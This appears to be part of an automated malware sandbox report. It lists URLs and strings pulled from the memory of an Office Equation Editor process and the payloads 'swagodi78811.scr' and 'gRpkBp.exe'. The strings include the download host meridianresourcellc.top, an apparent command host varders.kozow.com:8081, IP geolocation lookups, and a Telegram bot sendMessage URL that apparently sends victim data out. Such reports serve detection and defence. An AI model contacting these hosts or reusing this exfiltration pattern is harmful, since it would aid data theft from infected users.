Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000248D000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002386000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002568000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002439000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002465000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/X
Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002559000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002539000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgX
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.665349754.0000000005A80000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.665234805.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.00000000007E6000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.665234805.0000000005C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.c
Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgX
Source: taskeng.exe, 00000015.00000002.662983168.000000000033E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoftXT7/windows/2004/02/mit/tas
Source: swagodi78811.scr, 0000000A.00000002.410819357.0000000002101000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 00000016.00000002.427914204.00000000021C1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000023F1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000022F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: swagodi78811.scr, 00000014.00000002.663684485.00000000025A4000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:528110%0D%0ADate%20a
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: swagodi78811.scr, 00000014.00000002.664602794.000000000352D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.visualstud
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, meridianresourcellc.top.url.0.dr	String found in binary or memory: https://meridianresourcellc.top/
Source: swagodi.doc.url.0.dr	String found in binary or memory: https://meridianresourcellc.top/swagodi.doc
Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.393794677.00000000042A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://meridianresourcellc.top/swagodi.scr
Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://meridianresourcellc.top/swagodi.scrj
Source: EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://meridianresourcellc.top/swagodi.scrllC:
Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://meridianresourcellc.top/swagodi.scrsoC:
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: swagodi78811.scr, 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002498000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002398000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.330Kp
